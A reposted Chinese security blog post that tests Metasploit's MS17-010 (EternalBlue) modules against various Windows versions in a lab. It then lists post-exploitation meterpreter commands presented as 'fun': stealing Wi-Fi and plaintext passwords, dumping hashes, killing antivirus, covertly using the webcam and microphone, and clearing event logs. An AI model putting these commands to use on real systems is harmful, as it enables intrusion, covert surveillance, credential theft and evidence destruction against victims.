那些年,我们追过的“蓝”

2019-04-04 约 1476 字 预计阅读 3 分钟

声明:本文 【那些年,我们追过的“蓝”】 由作者 5ecu**** 于 2018-03-13 14:35:00 首发 先知社区 曾经 浏览数 1418 次

感谢 5ecu**** 的辛苦付出!

Author:publicmonkey@5ecurity.cn

那些年,我们一起追过的“蓝”

目前MSF下利用ms17-010主要有以下三个模块:
1.exploit/windows/smb/enternalblue_doublepulsar
下载地址:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2.kali官方最早支持的exploit/windows/smb/ms17_010_eternalblue模块
3.最近更新的exploit/windows/smb/ms17_010_psexec模块
下载地址:https://github.com/rapid7/metasploit-framework/pull/9473
本次主要分析exploit/windows/smb/ms17_010_psexec模块,周更新kali已纳入此模块

1.安装与测试

kali2.0及以下版本需安装该模块(或下载最新版msf)

此处应注意安装其他四个依赖模块,reload_all不报错即可。
操作如下:

1.1.测试Microsoft(R) Windows(R) Server 2003, Enterprise Edition(ip: 192.168.253.141)

此版本在多次测试中稳定利用,此处不再赘述。

1.2. 测试Microsoft Windows XP Professional(ip: 192.168.253.136)

此版本在多次测试中稳定利用,此处也不再赘述。

1.3. 测试Microsoft Windows 7 家庭普通版(ip: 192.168.253.135)

当前模块需指定SMBPass和SMBUser建立window命名管道。

1.3.1.Win7使用exploit/windows/smb/ms17_010_eternalblue模块可被稳定利用

1.4.测试Microsoft Windows Server 2008 R2 Datacenter(ip: 192.168.253.135)

需指定SMBPass和SMBUser建立window命名管道。

1.4.1.使用exploit/windows/smb/ms17_010_eternalblue模块,部分winserver2008可被稳定利用,多次实际测试中发现winserver2008企业版利用不稳定,易导致蓝屏重启。

1.5.测试Windows 8.1 Pro 9600|Windows 8.1 Pro 6.3(ip: 10.0.21.160)

目前发现Windows 8.1 Pro 9600可以稳定利用,较高版本需要建立windows命名管道。

1.6.测试winserver2012(ip: 192.168.253.146)

需指定SMBPass和SMBUser建立window命名管道。

1.7.测试win10(ip: 192.168.253.145)

部分老版本稳定利用,较新版本需指定SMBPass和SMBUser建立window命名管道。
测试中发现Windows 10 Home 10586版本无需建立windows命名管道稳定利用,测试如下:

2.分享几条好玩的命令:

测试机为一台windows7 X64旗舰版未更新到最新的补丁

bgrun post/windows/wlan/wlan_profile //读取无线连接的账号密码

此处执行失败换一种方式

在cmdshell下执行netsh wlan show profiles

wdigest //抓取明文密码(需加载mimikatz模块)

bgrun killav //杀掉杀毒软件

webcam_list //查看有没有摄像头

bgrun webcam //启动摄像头

webcam_snap -i 1 -v false //启动摄像头拍摄一张照片但不打开闪光灯

bgrun sound_recorder //启动声音录制

bgrun hashdump //获取哈希值

bgrun vnc //启动vnc连接

screenshot //对目标系统桌面进行截屏

clearev //清除日志

关键词:[‘新手’, ‘入门资料’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now